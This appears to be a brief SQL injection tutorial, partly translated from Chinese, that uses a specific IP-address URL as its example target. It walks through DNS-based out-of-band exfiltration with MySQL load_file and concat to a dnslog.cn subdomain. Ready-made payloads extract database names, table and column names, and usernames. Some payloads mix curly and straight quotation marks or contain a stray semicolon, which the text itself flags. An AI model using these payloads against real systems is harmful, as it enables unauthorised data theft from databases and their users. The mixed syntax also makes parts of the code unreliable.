Take http://59.63.200.79:8022/cat/index.php?id=1 as an example,
There is a problem with the single quotation mark in the following sentence. It is in Chinese. Please correct it yourself:
Query all database names: (the following are the steps, understand and write injection sql by yourself)
1.select distinct TABLE_SCHEMA from information_schema.TABLES //Get all database names from the TABLES table of the information_schema library;
2. You can use limit to echo one database name at a time, such as limit 0,1 to echo the first database name, or you can combine all database names and echo them together. The sql statement should be: select group_concat(TABLE_SCHEMA) from ( select distinct TABLE_SCHEMA from information_schema.TABLES);
3.注入sql应该为and load_file(concat('//',(select group_concat(TABLE_SCHEMA) from (select distinct TABLE_SCHEMA from information_schema.TABLES);),'.jv2knh.dnslog.cn/1.txt'))
Query the current database name:
and load_file(concat('//',(select database()),'.jv2knh.dnslog.cn/1.txt'))
Query table name:
1.逐个回显:and load_file(concat('//',(select table_name from information_schema.tables where table_schema=’security’ limit 0,1),’.jv2knh.dnslog.cn/1.txt’))
2. Combined into a string echo: and load_file(concat('//',(select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1),'.jv2knh.dnslog.cn/ 1.txt'))
Query column name:
and load_file(concat(‘//’,(select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),’.jv2knh.dnslog.cn/1.txt’))
Query data:
and load_file(concat(‘//’,(select username from users limit 0,1),’.jv2knh.dnslog.cn/1.txt’))